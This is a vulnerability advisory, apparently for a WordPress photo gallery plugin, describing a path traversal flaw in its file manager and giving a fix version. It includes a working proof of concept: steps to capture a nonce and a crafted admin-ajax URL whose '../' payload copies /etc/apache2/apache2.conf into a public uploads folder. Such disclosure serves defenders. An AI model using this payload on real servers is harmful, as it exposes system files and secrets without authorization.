Path traversal vulnerability in Gallery may allow admins to read most files on the filesystem

Score Vector Complexity Authentication Confidentiality Integrity Availability
5.5
Medium
Network Low Single Partial Partial None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

The plugin contains a file manager component which allows broad access to the filesystem including deleting files, uploading files, and moving files. In this proof-of-concept we’ll be using path traversal to copy an Apache configuration file into a web-readable directory in order to allow the attacker to read secrets.

Proof of concept

  1. Visit: http://localhost/wp-admin/admin.php?page=galleries_bwg
  2. Click “Add New”
  3. Open the browser’s dev tools
  4. Click “Add Images”
  5. Find the request to a URL starting with “/wp-admin/admin-ajax.php?action=addImages&”
  6. Look for the bwg_nonce parameter in the URL and make a note of the value
  7. Visit this URL, making sure to replace NONCE_VALUE with the nonce you found: http://localhost/wp-admin/admin-ajax.php?action=addImages&bwg_nonce=NONCE_VALUE&callback=bwg_add_image&task=rename_item&file_names=../../../../../../etc/apache2/apache2.conf&file_new_name=apacheconfigfile
  8. To access the file, visit: http://localhost/wp-content/uploads/photo-gallery/apacheconfigfile.conf

Note that the number of “../”s you need to use will vary by server configuration, the file “/etc/apache2/apache2.conf” will not be available in all configurations, and some servers may be configured to block requests to .conf files in wp-content/uploads.

If the www user has write access to /etc this could break Apache. But in most cases they will not, so PHP’s rename() function will merely copy the file instead of moving it.

Mitigation/further actions

Upgrade to version 1.3.34 or later.